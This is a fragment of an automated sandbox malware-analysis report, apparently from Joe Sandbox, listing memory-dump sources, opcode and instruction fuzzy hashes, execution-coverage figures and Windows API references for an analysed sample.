                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2b76db1a4f26d50d7218312e51afe87a7c6462aadb519380166aeec5ad5dfec
                                                        • Instruction ID: ffe269287c722bca2122497231c097a2ce2099e46b90bf8ce6172f10a976183e
                                                        • Opcode Fuzzy Hash: c2b76db1a4f26d50d7218312e51afe87a7c6462aadb519380166aeec5ad5dfec
                                                        • Instruction Fuzzy Hash: 0D917B31B11245CBCB08BFF9D9986ADBBF6BF88600F458429E449E7344EE349C56CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6968852dfbe4c3dc5f44b1f6b1596f9d47fe79af9abdeb2fe25b832f830aa495
                                                        • Instruction ID: a92f38c5e218afbd6e6285ad6303e2cc37c68cff038c27cd70757f06e9644cfa
                                                        • Opcode Fuzzy Hash: 6968852dfbe4c3dc5f44b1f6b1596f9d47fe79af9abdeb2fe25b832f830aa495
                                                        • Instruction Fuzzy Hash: 1A91B230B00258DFEB2C9AA9D454B7E7BA6FBC4700F154469E542DB68DDB34CC82CB56
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d88d2184100f0393db79adac1185bf56db9c0d0d98ead37314e6a59c43361d67
                                                        • Instruction ID: 993d2b5277ae0cf0039e1e9d367a3e9e05d5fed7363d1a0472b7d76c3d2c3564
                                                        • Opcode Fuzzy Hash: d88d2184100f0393db79adac1185bf56db9c0d0d98ead37314e6a59c43361d67
                                                        • Instruction Fuzzy Hash: 1E81BF30B00248DFEB2C9AA9D45477E76A2FBC8300F258469E546DB78DDB35CC82CB56
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5847517c8514239d3e583237310179ba6f4229e0f700cf043b8aae7c0372a018
                                                        • Instruction ID: b67785373053f08306c26e5764dde7c59211f089c4e3e295a579334411cf6912
                                                        • Opcode Fuzzy Hash: 5847517c8514239d3e583237310179ba6f4229e0f700cf043b8aae7c0372a018
                                                        • Instruction Fuzzy Hash: 5E81B030B00248DBEB2C9AA9D45477E76A2FBC4701F15846AE502DB68DDB35CC82CB56
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b27e9836af5d49c25eb09f728687e8aabe0298778fa9985b81b0a31de63742a3
                                                        • Instruction ID: b603036192622e703c5fa903acd2b0538063938cf936968d77c4c172e8ec5021
                                                        • Opcode Fuzzy Hash: b27e9836af5d49c25eb09f728687e8aabe0298778fa9985b81b0a31de63742a3
                                                        • Instruction Fuzzy Hash: F8213A31A08641CFC309EFB9D8A1679BBE5EFC1714F08889EE495CB781DA389811DF52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bdd549a3d0b9477ec176c182f853a782b9fdf4d0477578da0eb1d194a2ada8a
                                                        • Instruction ID: 3f96c3c0ca0bca620f0608e7ab0e2bd0e949c7f59ac64e0421ca0c2c265c8029
                                                        • Opcode Fuzzy Hash: 4bdd549a3d0b9477ec176c182f853a782b9fdf4d0477578da0eb1d194a2ada8a
                                                        • Instruction Fuzzy Hash: A32134B1604200DFDB05DFA5D5C8B1AFBE5FB84314F24C6ADE9494B296C33AD846CB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3f550a8637cf324838a5180cde7295a035fab8bd40ed78f476e911a6256ef18
                                                        • Instruction ID: a59a858d097c2ba5d77d87271ffeeb0f09d46f10124d0bbca0ac344cb7490f29
                                                        • Opcode Fuzzy Hash: c3f550a8637cf324838a5180cde7295a035fab8bd40ed78f476e911a6256ef18
                                                        • Instruction Fuzzy Hash: FA210471604204EFDB05DF55D9C8B2ABBE5FB84314F20C5EDE9894B296C336D846CB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3974cb051973c5441a92fbf206893fe31f15c1961fb4443e5e250a5c93dcafd0
                                                        • Instruction ID: da34942e538f28b4dd0b4852f763a4e2b89a8ea6d20967366f21884ceeed777f
                                                        • Opcode Fuzzy Hash: 3974cb051973c5441a92fbf206893fe31f15c1961fb4443e5e250a5c93dcafd0
                                                        • Instruction Fuzzy Hash: FD214174E0010ADFEB08EBA4D9557AEB7B1FF84304F108129D2156B384DB756E45CB95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0bdd2a071c80df8b141b46cee5d9c1afcbb16c638ec7640b157bb724a966ff9f
                                                        • Instruction ID: d2b0e5c76e753453c6e0af2c4e01bf116e13ea9d31aa0769052981b3adcbfb7c
                                                        • Opcode Fuzzy Hash: 0bdd2a071c80df8b141b46cee5d9c1afcbb16c638ec7640b157bb724a966ff9f
                                                        • Instruction Fuzzy Hash: 6911D6317002099FDB09AF29D944A9E3BAAFB84B18F004528F9058B359CF78CD55DF90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction ID: e496a4c345552e0fa6e799db72177883e1bb75f2a749713dffc1b5e5e7d9f8d8
                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction Fuzzy Hash: C111BB75504280DFDB06CF54D9D4B15BBA2FB84314F24C6EAD8894B296C33AD44ACB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377237549.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10ed000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction ID: f53d776a0391850149992ccf87453bcefbfa450aa4d1b2feeb5617788a4b46c7
                                                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                        • Instruction Fuzzy Hash: 1511D075504280CFCB06CF64D5C4B15BFA1FB84314F28C6AED8494B2A7C33AD40ACB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377024556.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f8d000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 363d94fa146b2dc9ac46a07f56e5ab5135c9b8b59b7353ef19361073bab48e3b
                                                        • Instruction ID: ce63af4e21dca20ffbad6a97da5f7d9f546b342afd1641d16ffb73228473d360
                                                        • Opcode Fuzzy Hash: 363d94fa146b2dc9ac46a07f56e5ab5135c9b8b59b7353ef19361073bab48e3b
                                                        • Instruction Fuzzy Hash: DE01F731404345DAE7209A15DD807A7BB98EF41334F18C45AED081A1C2C3389841D7B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccebc40e8fdaa1a1f4a5f19e3febc0a92aa34ecf42f8beddcae6a9fb4332d290
                                                        • Instruction ID: 5488f55054f0f37326107e52f414e54c3121e9fe214d367b7daada004e77ce79
                                                        • Opcode Fuzzy Hash: ccebc40e8fdaa1a1f4a5f19e3febc0a92aa34ecf42f8beddcae6a9fb4332d290
                                                        • Instruction Fuzzy Hash: 65113570D0020AAFDB41EFA5D8116EEBBF1FB89300F1086AAC155EB365EB354B019B80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc6071a3ff6ee8d990af187551d403ea4f56ff03e0a96b6c176f8854301220f4
                                                        • Instruction ID: 81e01170e5ac3bc25097548ea8e337cff4dcecc9a7c0d380f5d817318b9b38ec
                                                        • Opcode Fuzzy Hash: bc6071a3ff6ee8d990af187551d403ea4f56ff03e0a96b6c176f8854301220f4
                                                        • Instruction Fuzzy Hash: 38010870E0020EAFDB40EFA5D95069EBBF6FB88700F1085AAC155E7354EB355B059B80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377024556.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f8d000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4165d60d7188e0651691a5fd5ffc6daff3e638399f35a7eba733b0d27311c567
                                                        • Instruction ID: c59439c875532573b307c35d02fae32884e7aba37d9faca8187e76575e44fcdc
                                                        • Opcode Fuzzy Hash: 4165d60d7188e0651691a5fd5ffc6daff3e638399f35a7eba733b0d27311c567
                                                        • Instruction Fuzzy Hash: C3F0CD71804344AAE7208E1AD884BA2FFA8EF81734F18C45AED080E2C2C3789840CBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cabb17ef2be8ddcd5621b025fbe5050a316d4befeb4546fb4b0eefd472e07d69
                                                        • Instruction ID: 51591b6cd6ec2af82f311419df93b72330d57710e23d72be13bbacb89b8119b0
                                                        • Opcode Fuzzy Hash: cabb17ef2be8ddcd5621b025fbe5050a316d4befeb4546fb4b0eefd472e07d69
                                                        • Instruction Fuzzy Hash: EDF03735D0028B8ECF41DFA9C9091EEBFB1EF86314F04446AD654B7000E770125ACB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a178582fc3e999798bdb12162c1075cb7c51a05e764df776e8c2d86ec9694e
                                                        • Instruction ID: 6569bb55328d82d033812bf17738ce9eb4146dc665431207a12d3f4100f57612
                                                        • Opcode Fuzzy Hash: e5a178582fc3e999798bdb12162c1075cb7c51a05e764df776e8c2d86ec9694e
                                                        • Instruction Fuzzy Hash: F0F0903150A3CE8FDB16DBB0886649ABF76EE4220571A84DFE8419F563DA39440ACF52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e94d4c08e9cd1223a2473db4b3f207f6101a436edabb00dbb396aa661c12adb
                                                        • Instruction ID: 93af222fe98f7d169bad218eb9d1c50b51feb3c1943dbd1693b2a004d55c34cb
                                                        • Opcode Fuzzy Hash: 0e94d4c08e9cd1223a2473db4b3f207f6101a436edabb00dbb396aa661c12adb
                                                        • Instruction Fuzzy Hash: 7CF08C3054B3908FC3129F70D5684AA3F39EF1260638944E9E846CB692CF32C417CF11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6465e0ec7815f31dc6d4d21a9cbf3f6252cc62a1a8c624c264d04c503cb7e46f
                                                        • Instruction ID: ef4dc3e7acf4464cd53c1cb4787e5847ccb144fa800ad302689999dd684f6ef8
                                                        • Opcode Fuzzy Hash: 6465e0ec7815f31dc6d4d21a9cbf3f6252cc62a1a8c624c264d04c503cb7e46f
                                                        • Instruction Fuzzy Hash: ECE0653154B3518FD3025B7199280A63B35EE52A4538E00D6F885C7952CE35C816CB21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5f8b5c7e6979d4e4c01d4a13f2c9a2b99c37d1c1a594f3eaa7d0fc5a9a381b7
                                                        • Instruction ID: 20a927476db89b6327ff5e9ac9975aad6d6c22c1fee9fbd52bd45c42bc40b22e
                                                        • Opcode Fuzzy Hash: a5f8b5c7e6979d4e4c01d4a13f2c9a2b99c37d1c1a594f3eaa7d0fc5a9a381b7
                                                        • Instruction Fuzzy Hash: 06E012B1A04254AFDB59DB6CA4557AFBBE9DF85260B1440ABE009E3251C93168008B58
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b073506707c36c9113d388ddd43a65573da53125020cfc476d2a57683710799b
                                                        • Instruction ID: 60b3d4616387e41030426b0090235393ea322bf7a8090527b2680fb435c7c5ea
                                                        • Opcode Fuzzy Hash: b073506707c36c9113d388ddd43a65573da53125020cfc476d2a57683710799b
                                                        • Instruction Fuzzy Hash: 44D01731A04054CACF2C8AA8B4902AC7361F7C8316B114966D6178694CDB2188168656
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e917f4598c1f1706a0b119048f56f4271b4e6f8ed93ed888eaab38223eee6f1
                                                        • Instruction ID: 484e0227dee34f01a7e127384a822ea3fd5626e2f9ba8144795f42c31da3dcd3
                                                        • Opcode Fuzzy Hash: 8e917f4598c1f1706a0b119048f56f4271b4e6f8ed93ed888eaab38223eee6f1
                                                        • Instruction Fuzzy Hash: 07D05E31B04054CFCF2C8EE8B4902AC7361F7C8316F104D66D617C350CDB3188128652
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08e374c7dd0011f0e3cedcf43df1fe5aaa0435e735733e464836300857d3968f
                                                        • Instruction ID: 30c1ff4090cea93572d6843fe4a4898b4f9954d95bc3dcc86ab043b83ac9b7a1
                                                        • Opcode Fuzzy Hash: 08e374c7dd0011f0e3cedcf43df1fe5aaa0435e735733e464836300857d3968f
                                                        • Instruction Fuzzy Hash: 65D0673BB40008DFCB049F99E8809DDF776FB9C321B048516F925A3264CA719926DBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d693e7cf02b546b05006deae2a0fa46d0d40b2da1c5206470145166adb3ee0a8
                                                        • Instruction ID: 35aa0c4360c0a8bc0c07c8f6c592aef242ef59aca04d43b5df14dd043f9b2814
                                                        • Opcode Fuzzy Hash: d693e7cf02b546b05006deae2a0fa46d0d40b2da1c5206470145166adb3ee0a8
                                                        • Instruction Fuzzy Hash: 71E0C2344002428FCB01E738E9D5A8D7BA1FF40308F044504E0454B32BCE309857CB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 382a46366c5cc96b9ac598cfb37a79f9040b1f7880e21ff54fe2f622a2c799a7
                                                        • Instruction ID: 02d66edbb78c6639c14d421cdca61902673793241ac0b433d8f57938a6bbab1b
                                                        • Opcode Fuzzy Hash: 382a46366c5cc96b9ac598cfb37a79f9040b1f7880e21ff54fe2f622a2c799a7
                                                        • Instruction Fuzzy Hash: 80D09234301149CFEB599B28C448A1A73A2BFC8205F2582A9E54A8B369DA31DC86DB41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f053f270992b081774c0ad63ece2db8ef074efbfd3d015c298967f11a2f7551
                                                        • Instruction ID: ca9d68ffd26256c0ec3c69a4db6a309f72dbd4601819c4adc94d8ceb0aec8a56
                                                        • Opcode Fuzzy Hash: 9f053f270992b081774c0ad63ece2db8ef074efbfd3d015c298967f11a2f7551
                                                        • Instruction Fuzzy Hash: 2BC0123441020B8AD501F765ED8555977DEEE80B087449914A10D0B71DDE74994697D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b1eda7c02921b76adadb3cdf63433faf13a39bd9550ec6eda8aa054c9054242
                                                        • Instruction ID: 1a7c5ee8e1ded429d873bba4a1cf8ee54ba2b7aaf36afdb25eb67e94529bfe2d
                                                        • Opcode Fuzzy Hash: 3b1eda7c02921b76adadb3cdf63433faf13a39bd9550ec6eda8aa054c9054242
                                                        • Instruction Fuzzy Hash: AB42E131B006008FDB14AB79C86576E77E6BFC8310F288669E15AEB3E5CE34DC468795
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390078698.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4bd0000_image.jbxd

                                                        Execution Graph

                                                        Execution Coverage: 23%
                                                        Dynamic/Decrypted Code Coverage: 100%
                                                        Signature Coverage: 1.3%
                                                        Total number of Nodes: 384
                                                        Total number of Limit Nodes: 26

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAE5E
                                                        • GetCurrentThread.KERNEL32 ref: 078FAE9B
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAED8
                                                        • GetCurrentThreadId.KERNEL32 ref: 078FAF31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAE5E
                                                        • GetCurrentThread.KERNEL32 ref: 078FAE9B
                                                        • GetCurrentProcess.KERNEL32 ref: 078FAED8
                                                        • GetCurrentThreadId.KERNEL32 ref: 078FAF31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078FF162
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078FF162
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0557F661
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3470065486.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_5570000_ACID.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078FAFEE,?,?,?,?,?), ref: 078FB0AF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3475613566.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_78f0000_ACID.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 078F9E7F
